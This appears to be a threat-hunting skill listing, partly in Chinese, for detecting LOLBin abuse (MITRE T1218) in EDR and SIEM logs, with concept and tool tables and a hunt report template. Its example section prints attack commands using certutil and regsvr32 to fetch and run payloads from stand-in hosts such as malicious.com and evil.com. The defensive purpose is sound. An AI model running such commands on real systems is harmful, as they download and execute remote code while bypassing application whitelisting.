Hunts attacker abuse of LOLBins like certutil, mshta, rundll32 in EDR/SIEM logs to detect evasion via signed binary proxy execution (MITRE T1218). Useful for proactive threat hunting.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 调查绕过传统杀毒软件的无文件恶意软件活动时
Proactively hunts for adversary abuse of LOLBins (legitimate system binaries like certutil, mshta) in EDR/SIEM logs to detect evasion tactics.
Hunts abuse of LOLBins like certutil, mshta, rundll32 in EDR/SIEM/Sysmon logs by baselining behavior and detecting anomalies. For proactive threat hunting and evasion detection.
Detects LOLBin abuse in Windows endpoint process logs by analyzing anomalous command lines, parent-child relations, non-standard paths, and network activity. For threat hunting with Sysmon or SIEM.
Share bugs, ideas, or general feedback.
| 概念 | 描述 |
|---|---|
| LOLBin | 被攻击者用于恶意目的的合法操作系统二进制文件 |
| LOLBAS 项目 | 社区维护的 Windows LOLBin、LOLLib 和 LOLScript 列表 |
| T1218 | MITRE ATT&CK——签名二进制文件代理执行 |
| T1218.001 | 编译 HTML 文件(mshta.exe) |
| T1218.002 | 控制面板(control.exe) |
| T1218.003 | CMSTP |
| T1218.005 | Mshta |
| T1218.010 | Regsvr32 |
| T1218.011 | Rundll32 |
| T1197 | BITS 任务(bitsadmin.exe) |
| T1140 | 解混淆/解码文件(certutil.exe) |
| 代理执行 | 使用受信任的二进制文件执行不受信任的代码 |
| 无文件攻击 | 主要在内存中运行而不落盘的攻击 |
| 工具 | 用途 |
|---|---|
| CrowdStrike Falcon | EDR 遥测和进程树分析 |
| Microsoft Defender for Endpoint | 使用 KQL 查询进行高级威胁狩猎 |
| Splunk | SIEM 日志聚合和 SPL 查询 |
| Elastic Security | 检测规则和时间线调查 |
| Sysmon | 详细的进程创建和网络日志 |
| LOLBAS 项目 | LOLBin 能力参考数据库 |
| Sigma Rules | LOLBin 通用检测规则格式 |
| Velociraptor | 终端取证采集和狩猎 |
certutil.exe -urlcache -split -f http://malicious.com/payload.exe 下载恶意软件,绕过允许 certutil 流量的 Web 代理。mshta.exe(Microsoft 签名的二进制文件)执行 VBScript 载荷。rundll32.exe shell32.dll,ShellExec_RunDLL 加载恶意 DLL,通过受信任的二进制文件代理执行。regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dll 执行远程 SCT 文件,绕过应用程序白名单。bitsadmin /transfer 创建 BITS 传输任务,反复下载并执行载荷。狩猎 ID:TH-LOLBIN-[日期]-[序号]
假设:[陈述的假设]
调查的 LOLBin:[二进制文件列表]
时间范围:[开始] - [结束]
数据源:[EDR、Sysmon、SIEM]
发现:
- [发现 1 及证据]
- [发现 2 及证据]
检测到的异常数:[数量]
真阳性:[数量]
假阳性:[数量]
已识别 IOC:[列表]
已创建/更新检测规则:[列表]
建议:[后续步骤]